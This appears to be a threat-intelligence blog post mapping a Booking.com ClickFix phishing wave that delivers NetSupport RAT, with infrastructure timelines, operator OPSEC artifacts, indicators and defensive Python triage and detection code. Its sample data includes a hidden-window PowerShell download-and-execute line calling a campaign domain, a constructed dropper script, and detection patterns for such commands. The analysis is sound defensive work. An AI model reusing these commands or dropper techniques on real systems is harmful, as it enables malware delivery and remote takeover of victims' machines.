
Same Campaign, Fresh Infrastructure: Mapping the Latest Booking.com ClickFix Wave Delivering NetSupport RAT

Seven-day infrastructure standup, Chinese/HK batch domain registration, dual C2 gateways, and two OPSEC artifacts

Published April 3, 2026

Booking.com phishing campaigns delivering NetSupport RAT via ClickFix fake CAPTCHAs are not new. Securonix has tracked them. Multiple vendors have published detections. The technique -- trick the victim into pasting a PowerShell command via a fake browser verification -- has been documented extensively.

What changes with each wave is the infrastructure. And the infrastructure from this week's wave, flagged by @JAMESWT_WT, was stood up in seven days, registered through Chinese and Hong Kong registrars in batch transactions, and left two OPSEC artifacts that fingerprint the operator's development environment.

This Wave's Chain

Stage 1 -- ClickFix at secure-extranet[.]com/captcha/

A Booking.com-branded fake CAPTCHA page. The page copies a PowerShell command to the victim's clipboard and instructs them to press Win+R, then Ctrl+V, then Enter. Standard ClickFix technique: the victim launches the payload themselves from the Run dialog, so no file is downloaded or opened through the browser, and email attachment scanning, download warnings, and Mark-of-the-Web protections never come into play.

Stage 2 -- Redirect via jskeowgo[.]com (77[.]91[.]97[.]92)

The clipboard PowerShell command calls jskeowgo[.]com, which returns a second command: it opens the real booking.com in the victim's browser, keeping the social-engineering illusion intact, while silently downloading Stage 3 in the background.

Stage 3 -- NetSupport RAT from 77[.]91[.]97[.]92/032.txt

A 9.4 MB PowerShell script containing 14 base64-encoded files that constitute a complete NetSupport Manager RAT deployment:

  • Creates a hidden folder on the Desktop
  • Writes all 14 RAT components
  • Creates a Startup folder LNK for persistence
  • Clears HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU to remove the record of the Win+R command

The RAT connects to dual C2 gateways: asfasfqwf[.]com:443 (primary, not resolving at the time of analysis) and asdasfa[.]com:443 (secondary, resolving to 5[.]188[.]87[.]49). Configuration: full stealth mode, no UI, no tray icon, 9999 maximum concurrent victims.
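A triage routine for a dropper of this shape, added here as an example and not the report's tooling: it finds every long base64 run in the script, decodes and types each one, and when one of them is a NetSupport client32.ini it pulls out the gateway addresses and stealth flags. The embedded dropper is constructed for the example (it is not 032.txt); the key names GatewayAddress, SecondaryGateway, Silent, SKMode and HideWhenIdle are the ones commonly seen in malicious client32.ini files, and the blob-length threshold of 64 characters is an assumption that keeps identifiers out of the match set.

```python
import base64
import binascii
import configparser
import re

# Constructed stand-in for a Stage 3 dropper: two base64 payloads wrapped in the kind
# of PowerShell a NetSupport dropper uses. NOT the campaign's 032.txt.
_FAKE_PE = b"MZ\x90\x00" + b"\x00" * 64            # only the MZ magic matters here
_FAKE_INI = b"""[Client]
_present=1
Silent=1
SKMode=1
HideWhenIdle=1
[HTTP]
GatewayAddress=asfasfqwf.com:443
SecondaryGateway=asdasfa.com:443
"""
SAMPLE_DROPPER = (
    '$d = "$env:USERPROFILE\\Desktop\\.sys"\n'
    'New-Item -ItemType Directory -Force $d | Out-Null\n'
    '(Get-Item $d).Attributes = "Hidden"\n'
    f'[IO.File]::WriteAllBytes("$d\\client32.exe", [Convert]::FromBase64String("{base64.b64encode(_FAKE_PE).decode()}"))\n'
    f'[IO.File]::WriteAllBytes("$d\\client32.ini", [Convert]::FromBase64String("{base64.b64encode(_FAKE_INI).decode()}"))\n'
    'Remove-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU -Name * -Force\n'
)

# Base64 runs of 64+ chars (~48 bytes) are embedded files, not identifiers (assumed threshold).
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def classify(data: bytes) -> str:
    """Cheap file typing for a decoded blob: PE, INI-looking text, other text, or binary."""
    if data[:2] == b"MZ":
        return "pe"
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "ini" if text.lstrip().startswith("[") else "text"


def parse_client32_ini(text: str) -> dict:
    """Pull gateway addresses and stealth flags out of a NetSupport client32.ini.
    configparser lower-cases keys, so comparisons below use lower case."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    cp.read_string(text)
    out = {"gateways": [], "stealth": {}}
    for section in cp.sections():
        for key, val in cp.items(section):
            if key in ("gatewayaddress", "secondarygateway") and val:
                out["gateways"].append(val.strip())
            elif key in ("silent", "skmode", "hidewhenidle"):
                out["stealth"][key] = val
    return out


def triage_dropper(script: str) -> dict:
    """Extract, decode and classify every embedded file; parse any client32.ini found."""
    report = {"files": [], "gateways": [], "stealth": {}}
    for m in BLOB_RE.finditer(script):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue                                   # long token that was not valid base64
        kind = classify(data)
        report["files"].append({"offset": m.start(), "size": len(data), "type": kind})
        if kind == "ini":
            cfg = parse_client32_ini(data.decode("utf-8"))
            report["gateways"].extend(cfg["gateways"])
            report["stealth"].update(cfg["stealth"])
    return report


if __name__ == "__main__":
    print(triage_dropper(SAMPLE_DROPPER))
```

Point it at a real 9.4 MB dropper with `triage_dropper(open(path).read())`; the gateway list is the pivot set for the network IoCs, and the offsets let you carve each component for hashing or YARA work.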

Infrastructure Timeline

Everything was registered in a seven-day window:

Date     Event
Mar 25   jskeowgo[.]com registered (CNOBIN, Beijing)
Mar 30   secure-extranet[.]com registered (NICENIC, Hong Kong)
Apr 1    asdasfa[.]com registered (NICENIC, sequential Registry Domain ID)
Apr 1    asfasfqwf[.]com registered (NICENIC, sequential Registry Domain ID)
Apr 2    C2 active, payload serving confirmed

All four domains were registered through Chinese and Hong Kong registrars (CNOBIN International Technology, NICENIC International Group), and the two C2 domains created on Apr 1 carry consecutive Registry Domain IDs, the per-domain identifier the registry assigns at creation (not the IANA Registrar ID, which is a fixed number per registrar). Consecutive IDs at the same registrar on the same day mean the two were created in one batch transaction. This is a procurement pattern, not coincidence.
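The batch check, as an added example rather than anything from the report: given RDAP records for a set of domains, group the ones that share a registrar and have registry handles within one of each other and creation times within an hour. The records below are constructed in the shape of a .com RDAP response (the Registry Domain ID is the `handle`, in Verisign's `<number>_DOMAIN_COM-VRSN` form; the registrar's IANA ID sits under `entities[].publicIds`), but every number, timestamp and IANA ID in them is invented; confirm the handle format against a live `rdap.verisign.com` response before relying on the regex.

```python
import re
from datetime import datetime, timedelta

# Constructed records shaped like .com RDAP output. All handles, dates and IANA IDs
# are invented for the example; only the domain names come from the report.
SAMPLE_RDAP = [
    {"ldhName": "JSKEOWGO.COM", "handle": "2991000417_DOMAIN_COM-VRSN",
     "events": [{"eventAction": "registration", "eventDate": "2026-03-25T09:14:02Z"}],
     "entities": [{"roles": ["registrar"], "publicIds": [{"type": "IANA Registrar ID", "identifier": "9001"}]}]},
    {"ldhName": "SECURE-EXTRANET.COM", "handle": "2992118650_DOMAIN_COM-VRSN",
     "events": [{"eventAction": "registration", "eventDate": "2026-03-30T16:40:11Z"}],
     "entities": [{"roles": ["registrar"], "publicIds": [{"type": "IANA Registrar ID", "identifier": "9002"}]}]},
    {"ldhName": "ASDASFA.COM", "handle": "2992540871_DOMAIN_COM-VRSN",
     "events": [{"eventAction": "registration", "eventDate": "2026-04-01T11:02:15Z"}],
     "entities": [{"roles": ["registrar"], "publicIds": [{"type": "IANA Registrar ID", "identifier": "9002"}]}]},
    {"ldhName": "ASFASFQWF.COM", "handle": "2992540872_DOMAIN_COM-VRSN",
     "events": [{"eventAction": "registration", "eventDate": "2026-04-01T11:02:16Z"}],
     "entities": [{"roles": ["registrar"], "publicIds": [{"type": "IANA Registrar ID", "identifier": "9002"}]}]},
]

HANDLE_RE = re.compile(r"^(\d+)_DOMAIN_COM-VRSN$")   # assumed Verisign .com handle form


def summarize(record: dict) -> dict:
    """Reduce one RDAP record to domain, numeric registry handle, creation time, registrar IANA ID."""
    m = HANDLE_RE.match(record["handle"])
    registered = next(datetime.fromisoformat(e["eventDate"].replace("Z", "+00:00"))
                      for e in record["events"] if e["eventAction"] == "registration")
    registrar = next(p["identifier"]
                     for ent in record["entities"] if "registrar" in ent.get("roles", [])
                     for p in ent.get("publicIds", []) if p["type"] == "IANA Registrar ID")
    return {"domain": record["ldhName"].lower(), "seq": int(m.group(1)) if m else None,
            "registered": registered, "registrar": registrar}


def find_batches(records: list, max_gap: int = 1, max_delta: timedelta = timedelta(hours=1)) -> list:
    """Group domains whose registry handles sit within max_gap of each other at the same
    registrar and were created within max_delta: the fingerprint of one batch order."""
    rows = sorted((summarize(r) for r in records), key=lambda s: (s["registrar"], s["seq"] or 0))
    batches, current = [], []
    for row in rows:
        prev = current[-1] if current else None
        if (prev and row["registrar"] == prev["registrar"]
                and row["seq"] is not None and prev["seq"] is not None
                and row["seq"] - prev["seq"] <= max_gap
                and abs(row["registered"] - prev["registered"]) <= max_delta):
            current.append(row)
        else:
            if len(current) > 1:
                batches.append([r["domain"] for r in current])
            current = [row]
    if len(current) > 1:
        batches.append([r["domain"] for r in current])
    return batches


if __name__ == "__main__":
    print(find_batches(SAMPLE_RDAP))
```

Feed it the JSON from `https://rdap.verisign.com/com/v1/domain/<name>` for each candidate; a non-empty result is the same signal the timeline above reads off by hand, and raising `max_gap` a little catches batches where an unrelated registration landed between two of the operator's.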

OPSEC Failures

Two artifacts fingerprint the operator:

  1. RDP certificate on the C2 at 5[.]188[.]87[.]49 leaks the hostname WIN-FLJTJKL01VM. Windows generates a self-signed certificate for Remote Desktop whose subject CN is the machine's computer name, so enabling RDP on the C2 server without replacing that default certificate hands the host's name to anyone who completes a TLS handshake on port 3389. The WIN-<random> form is the name Windows assigns at install, so the box was never renamed either.

  2. PDB path in the NetSupport client configuration references C:\Users\Administrator\Desktop\HTCTL32\. NetSupport's own binaries are vendor-signed and carry NetSupport's build paths, so a path under an Administrator desktop is unlikely to come from the vendor build: the operator staged or configured the RAT payload from that directory, and the path leaked into the deployed configuration.

Neither artifact is sufficient for attribution, but both are useful for linking future infrastructure to this same operator.
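The linking pivot for the first artifact, written here as an added example (not the report's tooling): speak just enough RDP to get a server into TLS, then read the subject CN off the certificate it presents. It assumes the target answers an X.224 Connection Request on 3389 with an RDP_NEG_RSP selecting TLS or CredSSP (both start with a TLS handshake); the DER subject used for the offline check is constructed by `sample_subject`, and the CN scan is a deliberately minimal DER walk that is adequate for self-signed RDP certificates, not a general X.509 parser.

```python
import socket
import ssl
import struct
import sys

CN_OID = b"\x06\x03\x55\x04\x03"        # DER encoding of OID 2.5.4.3 (commonName)


def build_x224_connection_request(protocols: int = 0x3) -> bytes:
    """TPKT + X.224 CR TPDU + RDP_NEG_REQ asking for TLS (0x1) and/or CredSSP (0x2)."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, protocols)    # type, flags, length, requestedProtocols
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + neg_req                 # CR code, dst-ref, src-ref, class option
    x224 = bytes([len(x224)]) + x224                              # X.224 length indicator
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224        # TPKT: version 3, reserved, total length


def parse_x224_connection_confirm(data: bytes) -> int:
    """Return selectedProtocol from the server's RDP_NEG_RSP (0 = legacy RDP security only)."""
    if len(data) < 11 or data[0] != 3 or data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    body = data[11:]                                  # past TPKT(4) + LI(1) + CC fixed part(6)
    if len(body) < 8:
        return 0                                      # server sent no negotiation response
    kind, _flags, _length, value = struct.unpack("<BBHI", body[:8])
    if kind == 0x03:
        raise ValueError(f"RDP_NEG_FAILURE failureCode={value}")
    if kind != 0x02:
        raise ValueError(f"unexpected negotiation type {kind:#x}")
    return value


def extract_common_names(der: bytes) -> list:
    """Scan a DER certificate for commonName attributes (short-form lengths only, which is
    all a self-signed RDP cert uses). Subject and issuer both match on a self-signed cert,
    so duplicates are collapsed."""
    names = []
    pos = der.find(CN_OID)
    while pos != -1:
        tag_pos = pos + len(CN_OID)
        if tag_pos + 2 <= len(der):
            tag, length = der[tag_pos], der[tag_pos + 1]
            if length < 0x80 and tag in (0x0C, 0x13, 0x16):        # UTF8String, PrintableString, IA5String
                value = der[tag_pos + 2:tag_pos + 2 + length].decode("utf-8", "replace")
                if value not in names:
                    names.append(value)
        pos = der.find(CN_OID, tag_pos)
    return names


def fetch_rdp_certificate(host: str, port: int = 3389, timeout: float = 5.0) -> bytes:
    """Negotiate up to TLS on an RDP listener and return the server certificate in DER."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_x224_connection_request())
        selected = parse_x224_connection_confirm(sock.recv(1024))
        if selected not in (1, 2):
            raise RuntimeError("server did not select TLS or CredSSP; no certificate to read")
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False                    # we are fingerprinting, not authenticating
        ctx.verify_mode = ssl.CERT_NONE
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def _der_tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value          # short-form length only


def sample_subject(cn: str) -> bytes:
    """Constructed DER Name (SEQUENCE of SET of AttributeTypeAndValue) for offline testing."""
    atv = _der_tlv(0x30, CN_OID + _der_tlv(0x13, cn.encode()))
    return _der_tlv(0x30, _der_tlv(0x31, atv))


if __name__ == "__main__":
    print(extract_common_names(fetch_rdp_certificate(sys.argv[1])))
```

Run it across the candidate IPs you are pivoting on; a second host answering with CN=WIN-FLJTJKL01VM is the link this section describes. Very old Windows builds that only offer TLS 1.0 will fail the handshake under Python's default minimum version, which is a gap of the tool, not evidence of a different operator.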

What's Different From Prior Waves

Aspect            Prior Documented Waves   This Wave
Registrars        Various                  Chinese/HK batch registration (CNOBIN, NICENIC)
C2 config         Single gateway           Dual gateway with failover
Payload delivery  Direct download          3-stage, with a redirect to the real booking.com as cover
Stage 3 size      Varies                   9.4 MB (14 files, all base64-encoded in one script)
Persistence       Various                  Startup folder LNK + RunMRU cleanup
Max victims       Varies                   9999 (configured in client32.ini)

Indicators of Compromise

Network Indicators

  • secure-extranet[.]com (ClickFix lure)
  • jskeowgo[.]com / 77[.]91[.]97[.]92 (Stage 2 redirect)
  • asfasfqwf[.]com:443 (NetSupport C2 primary)
  • asdasfa[.]com:443 / 5[.]188[.]87[.]49 (NetSupport C2 secondary)

Host Indicators

  • Hidden Desktop folder containing NetSupport RAT files
  • Startup folder LNK pointing to client32.exe
  • Run MRU registry key cleaned post-execution
  • C2 hostname: WIN-FLJTJKL01VM
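Turning the host-side indicators into a correlation over process-creation, file-creation and registry events, as an added example that is not part of the report or its GitHub rules: a ClickFix launch (explorer.exe, the Run dialog's parent, spawning a hidden or download-and-execute PowerShell) followed on the same host within ten minutes by a Startup folder LNK drop or a RunMRU value deletion. The events are constructed Sysmon-style records (IDs 1, 11 and 12), not real telemetry, and the ten-minute window and the command-line patterns are tuning assumptions.

```python
import re
from datetime import datetime, timedelta

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed Sysmon-style events (NOT real telemetry): the ClickFix chain on WS01
# plus a benign scripted PowerShell launch on WS02 for contrast.
SAMPLE_EVENTS = [
    {"ts": "2026-04-02T10:00:01", "host": "WS01", "id": 1, "Image": PS,
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://jskeowgo.com/x -UseBasicParsing)"'},
    {"ts": "2026-04-02T10:00:09", "host": "WS01", "id": 11, "Image": PS,
     "TargetFilename": "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\client32.lnk"},
    {"ts": "2026-04-02T10:00:10", "host": "WS01", "id": 12, "Image": PS, "EventType": "DeleteValue",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a"},
    {"ts": "2026-04-02T11:30:00", "host": "WS02", "id": 1, "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
]

CLICKFIX_CMD = re.compile(r"-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|https?://", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)


def is_clickfix_launch(e: dict) -> bool:
    """Event 1: explorer.exe (the Run dialog's parent) spawning a suspicious PowerShell."""
    return (e.get("id") == 1
            and e.get("ParentImage", "").lower().endswith("\\explorer.exe")
            and e.get("Image", "").lower().endswith("powershell.exe")
            and CLICKFIX_CMD.search(e.get("CommandLine", "")) is not None)


def is_startup_lnk(e: dict) -> bool:
    """Event 11: a .lnk written into a user's Startup folder."""
    return e.get("id") == 11 and STARTUP_LNK.search(e.get("TargetFilename", "")) is not None


def is_runmru_wipe(e: dict) -> bool:
    """Event 12: a value or key deleted under Explorer\\RunMRU (hiding the Win+R history)."""
    return (e.get("id") == 12
            and e.get("EventType") in ("DeleteValue", "DeleteKey")
            and "\\explorer\\runmru" in e.get("TargetObject", "").lower())


def correlate(events: list, window: timedelta = timedelta(minutes=10)) -> dict:
    """Return {host: stages seen} for hosts where a ClickFix launch is followed within
    `window` by at least one follow-on stage. A lone launch is not reported: that
    lets through an aborted lure, which is the trade-off of a chain detection."""
    alerts = {}
    for launch in (e for e in events if is_clickfix_launch(e)):
        t0 = datetime.fromisoformat(launch["ts"])
        stages = {"clickfix_launch"}
        for e in events:
            if e.get("host") != launch["host"]:
                continue
            t = datetime.fromisoformat(e["ts"])
            if not t0 <= t <= t0 + window:
                continue
            if is_startup_lnk(e):
                stages.add("startup_lnk")
            if is_runmru_wipe(e):
                stages.add("runmru_wipe")
        if len(stages) > 1:
            alerts[launch["host"]] = stages
    return alerts


if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The three predicates map one-to-one onto the host indicators above, so each can also be shipped alone as a lower-severity rule; the correlation is what lifts them to an alert worth paging on.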

Detection

Five YARA rules and ten Suricata signatures are available on our GitHub:


h/t @JAMESWT_WT for flagging this wave.
